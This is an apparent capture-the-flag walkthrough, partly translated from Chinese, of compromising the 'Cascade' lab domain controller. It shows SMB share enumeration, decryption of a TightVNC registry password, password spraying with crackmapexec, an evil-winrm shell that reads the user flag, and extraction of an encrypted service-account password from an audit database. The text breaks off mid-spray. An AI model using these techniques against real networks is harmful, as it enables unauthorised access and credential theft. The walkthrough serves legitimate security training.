EP7UIP00.DLL.mui A 5120 Tue Jul 14 10:26:40 2009
FXSRES.DLL.mui A 165376 Tue Jul 14 10:28:24 2009
FXUCU001.DLL.mui A 7680 Tue Jul 14 10:28:24 2009
hp6000at.dll.mui A 48640 Tue Jul 14 10:29:56 2009
hp6000nt.dll.mui A 48640 Tue Jul 14 10:25:18 2009
hp6500at.dll.mui A 48640 Tue Jul 14 10:26:30 2009
hp6500nt.dll.mui A 48640 Tue Jul 14 10:26:34 2009
hp8000at.dll.mui A 48640 Tue Jul 14 10:29:38 2009
hp8500at.dll.mui A 48640 Tue Jul 14 10:27:44 2009
hp8500gt.dll.mui A 48640 Tue Jul 14 10:29:30 2009
hp8500nt.dll.mui A 48640 Tue Jul 14 10:28:46 2009
hpb8500t.dll.mui A 49152 Tue Jul 14 10:29:16 2009
hpc309at.dll.mui A 49152 Tue Jul 14 10:26:46 2009
hpc4500t.dll.mui A 49152 Tue Jul 14 10:28:24 2009
hpc4600t.dll.mui A 47616 Tue Jul 14 10:27:58 2009
hpc5300t.dll.mui A 49152 Tue Jul 14 10:23:56 2009
hpc5500t.dll.mui A 49152 Tue Jul 14 10:25:12 2009
hpc6300t.dll.mui A 49152 Tue Jul 14 10:27:34 2009
hpd2600t.dll.mui A 47616 Tue Jul 14 10:27:56 2009
hpD5400t.dll.mui A 49152 Tue Jul 14 10:27:28 2009
hpd7500t.dll.mui A 49152 Tue Jul 14 10:27:04 2009
hpf4400t.dll.mui A 47616 Tue Jul 14 10:24:56 2009
hpfevw73.dll.mui A 5120 Tue Jul 14 10:28:30 2009
hpfiew71.dll.mui A 2048 Tue Jul 14 10:30:16 2009
hpfiew73.dll.mui A 2048 Tue Jul 14 10:30:02 2009
HPFIME50.DLL.mui A 2048 Tue Jul 14 10:29:42 2009
hpfprw73.dll.mui A 3584 Tue Jul 14 10:30:04 2009
HPZ3Awn7.DLL.mui A 21504 Tue Jul 14 10:25:12 2009
HPZEVW71.DLL.mui A 6144 Tue Jul 14 10:27:10 2009
hpzevw72.dll.mui A 5120 Tue Jul 14 10:26:18 2009
HPZEVWN7.DLL.mui A 5120 Tue Jul 14 10:24:36 2009
hpzlaw71.dll.mui A 20992 Tue Jul 14 10:26:52 2009
HPZLAwn7.DLL.mui A 14336 Tue Jul 14 10:27:38 2009
HPZLSWN7.DLL.mui A 18944 Tue Jul 14 10:28:30 2009
hpzprw71.dll.mui A 3584 Tue Jul 14 10:26:42 2009
hpzprw72.dll.mui A 3584 Tue Jul 14 10:25:22 2009
HPZPRwn7.DLL.mui A 3584 Tue Jul 14 10:26:08 2009
HPZUIW71.DLL.mui A 67584 Tue Jul 14 10:25:24 2009
HPZUIWN7.DLL.mui A 47616 Tue Jul 14 10:24:52 2009
KO0C0001.DLL.mui A 15360 Tue Jul 14 10:26:04 2009
KYW7FR02.DLL.mui A 2048 Tue Jul 14 10:25:50 2009
kyw7fr03.dll.mui A 2048 Tue Jul 14 10:27:10 2009
kyw7fr04.dll.mui A 2048 Tue Jul 14 10:26:52 2009
KYW7FRES.DLL.mui A 2048 Tue Jul 14 10:24:12 2009
lxkpclrs.dll.mui A 7168 Tue Jul 14 10:28:16 2009
lxkpclui.dll.mui A 27648 Tue Jul 14 10:25:08 2009
lxkpsui.dll.mui A 30208 Tue Jul 14 10:27:36 2009
LXKXLRES.DLL.mui A 8192 Tue Jul 14 10:27:10 2009
LXKXLUI.DLL.mui A 27648 Tue Jul 14 10:27:28 2009
OK9IBRES.DLL.mui A 3072 Tue Jul 14 10:29:08 2009
OKDTERES.DLL.mui A 9216 Tue Jul 14 10:30:02 2009
OKDTURES.DLL.mui A 6656 Tue Jul 14 10:28:12 2009
PCL4RES.DLL.mui A 7168 Tue Jul 14 10:24:08 2009
PCL5ERES.DLL.mui A 18944 Tue Jul 14 10:29:32 2009
PCL5URES.DLL.mui A 18944 Tue Jul 14 10:28:40 2009
PCLXL.DLL.mui A 2560 Tue Jul 14 10:23:42 2009
PS5UI.DLL.mui A 14336 Tue Jul 14 10:29:50 2009
PSCRIPT5.DLL.mui A 4096 Tue Jul 14 10:25:02 2009
RIARES7.DLL.mui A 10752 Tue Jul 14 10:29:58 2009
RIAUI17.DLL.mui A 29696 Tue Jul 14 10:26:28 2009
RIAUI27.DLL.mui A 29696 Tue Jul 14 10:24:38 2009
RIPSUI7.DLL.mui A 29696 Tue Jul 14 10:27:26 2009
SH_1_RES.DLL.mui A 17408 Tue Jul 14 10:24:42 2009
SODPPUI2.DLL.mui A 4096 Tue Jul 14 10:27:50 2009
tsmxuui3.dll.mui A 6144 Tue Jul 14 10:29:24 2009
tsprint.dll.mui A 4096 Tue Jul 14 10:24:24 2009
TTYRES.DLL.mui A 2560 Tue Jul 14 10:30:28 2009
TTYUI.DLL.mui A 5120 Tue Jul 14 10:29:30 2009
UNIDRVUI.DLL.mui A 11264 Tue Jul 14 10:27:10 2009
UNIRES.DLL.mui A 8704 Tue Jul 14 10:28:18 2009

\x64\3\mui
. D 0 Tue Jul 14 13:41:16 2009
.. D 0 Tue Jul 14 13:41:16 2009
0409 D 0 Tue Jul 14 13:41:16 2009

\x64\3\mui\0409
. D 0 Tue Jul 14 13:41:16 2009
.. D 0 Tue Jul 14 13:41:16 2009
PSCRIPT.HLP A 26038 Thu Jun 11 05:41:00 2009
TTYUI.HLP A 14387 Thu Jun 11 05:41:00 2009
UNIDRV.HLP A 21225 Thu Jun 11 05:41:00 2009

6553343 blocks of size 4096. 1613811 blocks available

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.10.182\\SYSVOL -U r.thompson%rY4n5eva -c "recurse; ls"
. D 0 Thu Jan 9 23:31:27 2020
.. D 0 Thu Jan 9 23:31:27 2020
cascade.local Dr 0 Thu Jan 9 23:31:27 2020

\cascade.local
. D 0 Thu Jan 9 23:33:07 2020
.. D 0 Thu Jan 9 23:33:07 2020
DfsrPrivate DHSr 0 Thu Jan 9 23:33:07 2020
Policies D 0 Fri Jan 10 03:42:40 2020
scripts D 0 Thu Jan 16 05:50:33 2020

\cascade.local\DfsrPrivate
NT_STATUS_ACCESS_DENIED listing \cascade.local\DfsrPrivate\*

\cascade.local\Policies
. D 0 Fri Jan 10 03:42:40 2020
.. D 0 Fri Jan 10 03:42:40 2020
{2906D621-7B58-40F1-AA47-4ED2AEF29484} D 0 Fri Jan 10 02:13:00 2020
{31B2F340-016D-11D2-945F-00C04FB984F9} D 0 Thu Jan 9 23:31:40 2020
{322FEA29-156D-4476-8A06-1935A3525C1C} D 0 Fri Jan 10 02:29:34 2020
{4026EDF8-DBDA-4AED-8266-5A04B80D9327} D 0 Fri Jan 10 03:42:31 2020
{6AC1786C-016F-11D2-945F-00C04fB984F9} D 0 Thu Jan 9 23:31:40 2020
{820E48A7-D083-4C2D-B5F8-B24462924714} D 0 Fri Jan 10 02:33:51 2020
{D67C2AD5-44C7-4468-BA4C-199E75B2F295} D 0 Fri Jan 10 03:42:40 2020

\cascade.local\scripts
. D 0 Thu Jan 16 05:50:33 2020
.. D 0 Thu Jan 16 05:50:33 2020
MapAuditDrive.vbs A 258 Thu Jan 16 05:50:15 2020
MapDataDrive.vbs A 255 Thu Jan 16 05:51:03 2020

\cascade.local\Policies\{2906D621-7B58-40F1-AA47-4ED2AEF29484}
. D 0 Fri Jan 10 02:13:00 2020
.. D 0 Fri Jan 10 02:13:00 2020
GPT.INI A 59 Fri Jan 10 02:13:00 2020
Machine D 0 Fri Jan 10 02:13:00 2020
User D 0 Fri Jan 10 02:13:00 2020

\cascade.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
. D 0 Thu Jan 9 23:31:40 2020
.. D 0 Thu Jan 9 23:31:40 2020
GPT.INI A 23 Mon Mar 23 16:33:59 2020
MACHINE D 0 Thu Jan 9 23:31:40 2020
USER D 0 Thu Jan 9 23:31:40 2020

\cascade.local\Policies\{322FEA29-156D-4476-8A06-1935A3525C1C}
. D 0 Fri Jan 10 02:29:34 2020
.. D 0 Fri Jan 10 02:29:34 2020
GPO.cmt A 24 Fri Jan 10 02:29:34 2020
GPT.INI A 64 Wed Jan 29 06:07:51 2020
Machine D 0 Fri Jan 10 03:45:58 2020
User D 0 Fri Jan 10 03:46:06 2020

\cascade.local\Policies\{4026EDF8-DBDA-4AED-8266-5A04B80D9327}
. D 0 Fri Jan 10 03:42:31 2020
.. D 0 Fri Jan 10 03:42:31 2020
GPT.INI A 59 Fri Jan 10 03:42:31 2020
Machine D 0 Fri Jan 10 03:42:31 2020
User D 0 Fri Jan 10 03:42:31 2020

\cascade.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
. D 0 Thu Jan 9 23:31:40 2020
.. D 0 Thu Jan 9 23:31:40 2020
GPT.INI A 23 Mon Jan 27 01:12:15 2020
MACHINE D 0 Thu Jan 9 23:31:40 2020
USER D 0 Thu Jan 9 23:31:40 2020

\cascade.local\Policies\{820E48A7-D083-4C2D-B5F8-B24462924714}
. D 0 Fri Jan 10 02:33:51 2020
.. D 0 Fri Jan 10 02:33:51 2020
GPT.INI A 59 Fri Jan 10 02:33:51 2020
Machine D 0 Fri Jan 10 02:33:51 2020
User D 0 Fri Jan 10 02:33:51 2020

\cascade.local\Policies\{D67C2AD5-44C7-4468-BA4C-199E75B2F295}
. D 0 Fri Jan 10 03:42:40 2020
.. D 0 Fri Jan 10 03:42:40 2020
GPT.INI A 59 Fri Jan 10 03:42:40 2020
Machine D 0 Fri Jan 10 03:42:40 2020
User D 0 Fri Jan 10 03:42:40 2020

\cascade.local\Policies\{2906D621-7B58-40F1-AA47-4ED2AEF29484}\Machine
. D 0 Fri Jan 10 02:13:00 2020
.. D 0 Fri Jan 10 02:13:00 2020

\cascade.local\Policies\{2906D621-7B58-40F1-AA47-4ED2AEF29484}\User
. D 0 Fri Jan 10 02:13:00 2020
.. D 0 Fri Jan 10 02:13:00 2020

\cascade.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE
. D 0 Thu Jan 9 23:31:40 2020
.. D 0 Thu Jan 9 23:31:40 2020
Microsoft D 0 Thu Jan 9 23:31:40 2020
Registry.pol A 2790 Thu Jan 9 23:48:03 2020
Scripts D 0 Thu Jan 9 23:50:50 2020

\cascade.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER
. D 0 Thu Jan 9 23:31:40 2020
.. D 0 Thu Jan 9 23:31:40 2020

\cascade.local\Policies\{322FEA29-156D-4476-8A06-1935A3525C1C}\Machine
. D 0 Fri Jan 10 03:45:58 2020
.. D 0 Fri Jan 10 03:45:58 2020
Scripts D 0 Fri Jan 10 03:45:58 2020

\cascade.local\Policies\{322FEA29-156D-4476-8A06-1935A3525C1C}\User
. D 0 Fri Jan 10 03:46:06 2020
.. D 0 Fri Jan 10 03:46:06 2020
Documents & Settings D 0 Fri Jan 10 03:46:06 2020
Scripts D 0 Fri Jan 10 03:46:06 2020

\cascade.local\Policies\{4026EDF8-DBDA-4AED-8266-5A04B80D9327}\Machine
. D 0 Fri Jan 10 03:42:31 2020
.. D 0 Fri Jan 10 03:42:31 2020

\cascade.local\Policies\{4026EDF8-DBDA-4AED-8266-5A04B80D9327}\User
. D 0 Fri Jan 10 03:42:31 2020
.. D 0 Fri Jan 10 03:42:31 2020

\cascade.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE
. D 0 Thu Jan 9 23:31:40 2020
.. D 0 Thu Jan 9 23:31:40 2020
Applications D 0 Fri Jan 10 05:56:53 2020
Microsoft D 0 Thu Jan 9 23:31:40 2020
Scripts D 0 Fri Jan 10 02:44:58 2020

\cascade.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\USER
. D 0 Thu Jan 9 23:31:40 2020
.. D 0 Thu Jan 9 23:31:40 2020

\cascade.local\Policies\{820E48A7-D083-4C2D-B5F8-B24462924714}\Machine
. D 0 Fri Jan 10 02:33:51 2020
.. D 0 Fri Jan 10 02:33:51 2020

\cascade.local\Policies\{820E48A7-D083-4C2D-B5F8-B24462924714}\User
. D 0 Fri Jan 10 02:33:51 2020
.. D 0 Fri Jan 10 02:33:51 2020

\cascade.local\Policies\{D67C2AD5-44C7-4468-BA4C-199E75B2F295}\Machine
. D 0 Fri Jan 10 03:42:40 2020
.. D 0 Fri Jan 10 03:42:40 2020

\cascade.local\Policies\{D67C2AD5-44C7-4468-BA4C-199E75B2F295}\User
. D 0 Fri Jan 10 03:42:40 2020
.. D 0 Fri Jan 10 03:42:40 2020

\cascade.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft
. D 0 Thu Jan 9 23:31:40 2020
.. D 0 Thu Jan 9 23:31:40 2020
Windows NT D 0 Thu Jan 9 23:31:40 2020

\cascade.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Scripts
. D 0 Thu Jan 9 23:50:50 2020
.. D 0 Thu Jan 9 23:50:50 2020
Shutdown D 0 Thu Jan 9 23:50:50 2020
Startup D 0 Thu Jan 9 23:50:50 2020

\cascade.local\Policies\{322FEA29-156D-4476-8A06-1935A3525C1C}\Machine\Scripts
. D 0 Fri Jan 10 03:45:58 2020
.. D 0 Fri Jan 10 03:45:58 2020
Shutdown D 0 Fri Jan 10 03:45:58 2020
Startup D 0 Fri Jan 10 03:45:58 2020

\cascade.local\Policies\{322FEA29-156D-4476-8A06-1935A3525C1C}\User\Documents & Settings
. D 0 Fri Jan 10 03:46:06 2020
.. D 0 Fri Jan 10 03:46:06 2020

\cascade.local\Policies\{322FEA29-156D-4476-8A06-1935A3525C1C}\User\Scripts
. D 0 Fri Jan 10 03:46:06 2020
.. D 0 Fri Jan 10 03:46:06 2020
Logoff D 0 Fri Jan 10 03:46:06 2020
Logon D 0 Wed Jan 29 06:07:49 2020
scripts.ini H 6 Wed Jan 29 06:07:51 2020

\cascade.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Applications
. D 0 Fri Jan 10 05:56:53 2020
.. D 0 Fri Jan 10 05:56:53 2020

\cascade.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft
. D 0 Thu Jan 9 23:31:40 2020
.. D 0 Thu Jan 9 23:31:40 2020
Windows NT D 0 Thu Jan 9 23:31:40 2020

\cascade.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Scripts
. D 0 Fri Jan 10 02:44:58 2020
.. D 0 Fri Jan 10 02:44:58 2020
Shutdown D 0 Fri Jan 10 02:44:58 2020
Startup D 0 Fri Jan 10 02:44:58 2020

\cascade.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT
. D 0 Thu Jan 9 23:31:40 2020
.. D 0 Thu Jan 9 23:31:40 2020
SecEdit D 0 Thu Jan 9 23:51:09 2020

\cascade.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Scripts\Shutdown
. D 0 Thu Jan 9 23:50:50 2020
.. D 0 Thu Jan 9 23:50:50 2020

\cascade.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Scripts\Startup
. D 0 Thu Jan 9 23:50:50 2020
.. D 0 Thu Jan 9 23:50:50 2020

\cascade.local\Policies\{322FEA29-156D-4476-8A06-1935A3525C1C}\Machine\Scripts\Shutdown
. D 0 Fri Jan 10 03:45:58 2020
.. D 0 Fri Jan 10 03:45:58 2020

\cascade.local\Policies\{322FEA29-156D-4476-8A06-1935A3525C1C}\Machine\Scripts\Startup
. D 0 Fri Jan 10 03:45:58 2020
.. D 0 Fri Jan 10 03:45:58 2020

\cascade.local\Policies\{322FEA29-156D-4476-8A06-1935A3525C1C}\User\Scripts\Logoff
. D 0 Fri Jan 10 03:46:06 2020
.. D 0 Fri Jan 10 03:46:06 2020

\cascade.local\Policies\{322FEA29-156D-4476-8A06-1935A3525C1C}\User\Scripts\Logon
. D 0 Wed Jan 29 06:07:49 2020
.. D 0 Wed Jan 29 06:07:49 2020

\cascade.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT
. D 0 Thu Jan 9 23:31:40 2020
.. D 0 Thu Jan 9 23:31:40 2020
SecEdit D 0 Mon Jan 27 01:12:15 2020

\cascade.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Scripts\Shutdown
. D 0 Fri Jan 10 02:44:58 2020
.. D 0 Fri Jan 10 02:44:58 2020

\cascade.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Scripts\Startup
. D 0 Fri Jan 10 02:44:58 2020
.. D 0 Fri Jan 10 02:44:58 2020

\cascade.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit
. D 0 Thu Jan 9 23:51:09 2020
.. D 0 Thu Jan 9 23:51:09 2020
GptTmpl.inf A 1248 Mon Mar 23 16:33:59 2020

\cascade.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit
. D 0 Mon Jan 27 01:12:15 2020
.. D 0 Mon Jan 27 01:12:15 2020
GptTmpl.inf A 4086 Mon Jan 27 01:12:15 2020

Based on the SMB share listing, start enumerating to see what is worth looking at


┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.10.182\\Data -U r.thompson%rY4n5eva
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jan 27 11:27:34 2020
.. D 0 Mon Jan 27 11:27:34 2020
Contractors D 0 Mon Jan 13 09:45:11 2020
Finance D 0 Mon Jan 13 09:45:06 2020
IT D 0 Wed Jan 29 02:04:51 2020
Production D 0 Mon Jan 13 09:45:18 2020
Temps D 0 Mon Jan 13 09:45:15 2020

6553343 blocks of size 4096. 1613814 blocks available
smb: \> get \IT\"Email Archives"\Meeting_Notes_June_2018.html
getting file \IT\Email Archives\Meeting_Notes_June_2018.html of size 2522 as \IT\Email Archives\Meeting_Notes_June_2018.html (6.0 KiloBytes/sec) (average 6.0 KiloBytes/sec)
smb: \> get \IT\Logs\"Ark AD Recycle Bin"\ArkAdRecycleBin.log
getting file \IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log of size 1303 as \IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log (2.6 KiloBytes/sec) (average 4.1 KiloBytes/sec)
smb: \> get \IT\Logs\DCs\dcdiag.log
getting file \IT\Logs\DCs\dcdiag.log of size 5967 as \IT\Logs\DCs\dcdiag.log (11.6 KiloBytes/sec) (average 6.8 KiloBytes/sec)
smb: \> get \IT\Temp\s.smith\"VNC Install.reg"
getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as \IT\Temp\s.smith\VNC Install.reg (5.9 KiloBytes/sec) (average 6.6 KiloBytes/sec)
smb: \> exit

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.10.182\\NETLOGON -U r.thompson%rY4n5eva
Try "help" to get a list of possible commands.
smb: \> get MapAuditDrive.vbs
getting file \MapAuditDrive.vbs of size 258 as MapAuditDrive.vbs (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \> get MapDataDrive.vbs
getting file \MapDataDrive.vbs of size 255 as MapDataDrive.vbs (0.5 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \> exit

9. Then I downloaded the files I was most interested in

file:///home/kali/Desktop/%5CIT%5CEmail%20Archives%5CMeeting_Notes_June_2018.html

We will be using a temporary account to carry out all tasks related to the network migration; this account will be deleted at the end of 2018 once the migration is complete. This will allow us to identify migration-related actions in the security logs etc. The account is TempAdmin (the password is the same as the normal admin account password).

\IT\Temp\s.smith\VNC Install.reg

"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f

10. This is the VNC password, and it needs to be decrypted

Cracking the VNC password: some reading on TightVNC shows that it stores the password in the registry, encrypted with a static key. There are many tools that can handle this. I used this one. It needs a file containing the ciphertext, which I created with echo '6bcf2a4b6e5aca0f' | xxd -r -p > vnc_enc_pass:

root@kali# /opt/vncpwd/vncpwd vnc_enc_pass
Password: sT333ve2

That command uses the -r -p options of xxd to convert the hex string into raw binary.

I can also use the Bash trick <( ) to treat a command's output as the contents of a file:

root@kali# /opt/vncpwd/vncpwd <(echo '6bcf2a4b6e5aca0f' | xxd -r -p)
Password: sT333ve2

This link shows how to do the same thing in Metasploit, and that works too:

11. I followed the steps from the walkthrough above

┌──(kali㉿offsec)-[~/Desktop/vncpwd]
└─$ gcc -o vncpwd vncpwd.c d3des.c

┌──(kali㉿offsec)-[~/Desktop/vncpwd]
└─$ ./vncpwd
Usage: vncpwd <password file>

┌──(kali㉿offsec)-[~/Desktop/vncpwd]
└─$ ./vncpwd ../vnc_enc_pass
Password: sT333ve2

12. The password was recovered; next, check which account it belongs to

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.182 -u users -p 'sT333ve2' --continue-on-success
SMB 10.10.10.182 445 CASC-DC1 [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.10.10.182 445 CASC-DC1 [-] cascade.local\CascGuest:sT333ve2 STATUS_LOGON_FAILURE
SMB 10.10.10.182 445 CASC-DC1 [-] cascade.local\arksvc:sT333ve2 STATUS_LOGON_FAILURE
SMB 10.10.10.182 445 CASC-DC1 [+] cascade.local\s.smith:sT333ve2
SMB 10.10.10.182 445 CASC-DC1 [-] cascade.local\r.thompson:sT333ve2 STATUS_LOGON_FAILURE
SMB 10.10.10.182 445 CASC-DC1 [-] cascade.local\util:sT333ve2 STATUS_LOGON_FAILURE
SMB 10.10.10.182 445 CASC-DC1 [-] cascade.local\j.wakefield:sT333ve2 STATUS_LOGON_FAILURE
SMB 10.10.10.182 445 CASC-DC1 [-] cascade.local\s.hickson:sT333ve2 STATUS_LOGON_FAILURE
SMB 10.10.10.182 445 CASC-DC1 [-] cascade.local\j.goodhand:sT333ve2 STATUS_LOGON_FAILURE
SMB 10.10.10.182 445 CASC-DC1 [-] cascade.local\a.turnbull:sT333ve2 STATUS_LOGON_FAILURE
SMB 10.10.10.182 445 CASC-DC1 [-] cascade.local\e.crowe:sT333ve2 STATUS_LOGON_FAILURE
SMB 10.10.10.182 445 CASC-DC1 [-] cascade.local\b.hanson:sT333ve2 STATUS_LOGON_FAILURE
SMB 10.10.10.182 445 CASC-DC1 [-] cascade.local\d.burman:sT333ve2 STATUS_LOGON_FAILURE
SMB 10.10.10.182 445 CASC-DC1 [-] cascade.local\BackupSvc:sT333ve2 STATUS_LOGON_FAILURE
SMB 10.10.10.182 445 CASC-DC1 [-] cascade.local\j.allen:sT333ve2 STATUS_LOGON_FAILURE
SMB 10.10.10.182 445 CASC-DC1 [-] cascade.local\i.croft:sT333ve2 STATUS_LOGON_FAILURE

13. At this point it turns out my nmap port scan had missed something: port 5985 is open

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p5985 10.10.10.182
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-14 04:15 CST
Nmap scan report for cascade.local (10.10.10.182)
Host is up (0.11s latency).

PORT STATE SERVICE
5985/tcp open wsman

Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds

14. Log in with this account and read the flag

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.10.182 -u s.smith -p 'sT333ve2'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents> type ../Desktop/user.txt
ec388584ac52ba6f22693789b0f923eb
*Evil-WinRM* PS C:\Users\s.smith\Documents>

0x02 Obtaining system privileges

15. First, some basic enumeration

*Evil-WinRM* PS C:\Users\s.smith\Documents> net user s.smith
User name s.smith
Full Name Steve Smith
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never

Password last set 1/28/2020 8:58:05 PM
Password expires Never
Password changeable 1/28/2020 8:58:05 PM
Password required Yes
User may change password No

Workstations allowed All
Logon script MapAuditDrive.vbs
User profile
Home directory
Last logon 1/29/2020 12:26:39 AM

Logon hours allowed All

Local Group Memberships *Audit Share *IT
*Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\s.smith\Documents>


*Evil-WinRM* PS C:\Users\s.smith\Documents> net localgroup "Audit Share"
Alias name Audit Share
Comment \\Casc-DC1\Audit$

Members

-------------------------------------------------------------------------------
s.smith
The command completed successfully.

*Evil-WinRM* PS C:\Users\s.smith\Documents>


*Evil-WinRM* PS C:\Users\s.smith\Documents> cd C:\shares\audit
*Evil-WinRM* PS C:\shares\audit> ls


Directory: C:\shares\audit


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/28/2020 9:40 PM DB
d----- 1/26/2020 10:25 PM x64
d----- 1/26/2020 10:25 PM x86
-a---- 1/28/2020 9:46 PM 13312 CascAudit.exe
-a---- 1/29/2020 6:00 PM 12288 CascCrypto.dll
-a---- 1/28/2020 11:29 PM 45 RunAudit.bat
-a---- 10/27/2019 6:38 AM 363520 System.Data.SQLite.dll
-a---- 10/27/2019 6:38 AM 186880 System.Data.SQLite.EF6.dll


*Evil-WinRM* PS C:\shares\audit>

16. While enumerating I noticed the database and EXE files listed above, so I downloaded them over SMB to take a look

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.10.182\\Audit$ -U s.smith%sT333ve2 -c "recurse; ls"
. D 0 Thu Jan 30 02:01:26 2020
.. D 0 Thu Jan 30 02:01:26 2020
CascAudit.exe An 13312 Wed Jan 29 05:46:51 2020
CascCrypto.dll An 12288 Thu Jan 30 02:00:20 2020
DB D 0 Wed Jan 29 05:40:59 2020
RunAudit.bat A 45 Wed Jan 29 07:29:47 2020
System.Data.SQLite.dll A 363520 Sun Oct 27 14:38:36 2019
System.Data.SQLite.EF6.dll A 186880 Sun Oct 27 14:38:38 2019
x64 D 0 Mon Jan 27 06:25:27 2020
x86 D 0 Mon Jan 27 06:25:27 2020

\DB
. D 0 Wed Jan 29 05:40:59 2020
.. D 0 Wed Jan 29 05:40:59 2020
Audit.db An 24576 Wed Jan 29 05:39:24 2020

\x64
. D 0 Mon Jan 27 06:25:27 2020
.. D 0 Mon Jan 27 06:25:27 2020
SQLite.Interop.dll A 1639936 Sun Oct 27 14:39:20 2019

\x86
. D 0 Mon Jan 27 06:25:27 2020
.. D 0 Mon Jan 27 06:25:27 2020
SQLite.Interop.dll A 1246720 Sun Oct 27 14:34:20 2019

6553343 blocks of size 4096. 1613017 blocks available

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.10.182\\Audit$ -U s.smith%sT333ve2
Try "help" to get a list of possible commands.
smb: \> cd DB
smb: \DB\> get Audit.db
getting file \DB\Audit.db of size 24576 as Audit.db (35.2 KiloBytes/sec) (average 35.2 KiloBytes/sec)
smb: \DB\> exit

┌──(kali㉿offsec)-[~/Desktop]
└─$ file Audit.db
Audit.db: SQLite 3.x database, last written using SQLite version 3027002, file counter 60, database pages 6, 1st free page 6, free pages 1, cookie 0x4b, schema 4, UTF-8, version-valid-for 60

┌──(kali㉿offsec)-[~/Desktop]
└─$ sqlite3 Audit.db
SQLite version 3.44.2 2023-11-24 11:41:44
Enter ".help" for usage hints.
sqlite> .tables
DeletedUserAudit Ldap Misc
sqlite> select * from DeletedUserAudit;
6|test|Test
DEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d|CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
7|deleted|deleted guy
DEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef|CN=deleted guy\0ADEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef,CN=Deleted Objects,DC=cascade,DC=local
9|TempAdmin|TempAdmin
DEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a|CN=TempAdmin\0ADEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a,CN=Deleted Objects,DC=cascade,DC=local
sqlite> select * from Ldap;
1|ArkSvc|BQO5l5Kj9MdErXx6Q6AGOw==|cascade.local
sqlite> select * from Misc;
sqlite>

17. Nothing especially interesting. I think the Ldap table may hold a password, but the Base64-encoded data does not decode to ASCII. Perhaps it is encrypted in some way.

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.10.182\\Audit$ -U s.smith%sT333ve2
Try "help" to get a list of possible commands.
smb: \> get CascAudit.exe
getting file \CascAudit.exe of size 13312 as CascAudit.exe (20.9 KiloBytes/sec) (average 20.9 KiloBytes/sec)
smb: \> exit

┌──(kali㉿offsec)-[~/Desktop]
└─$ file CascAudit.exe
CascAudit.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections

18. I will not demonstrate this part. The technique is to decompile the EXE with dnSpy and set a breakpoint in the debugger to capture the password the EXE uses when it connects to the database; I will just use the screenshot from the walkthrough report

w3lc0meFr31nd

19. Based on the row in the SQLite DB, the password w3lc0meFr31nd is probably paired with the arksvc account.

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec winrm 10.10.10.182 -u users -p 'w3lc0meFr31nd' --continue-on-success
SMB 10.10.10.182 5985 CASC-DC1 [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
HTTP 10.10.10.182 5985 CASC-DC1 [*] http://10.10.10.182:5985/wsman
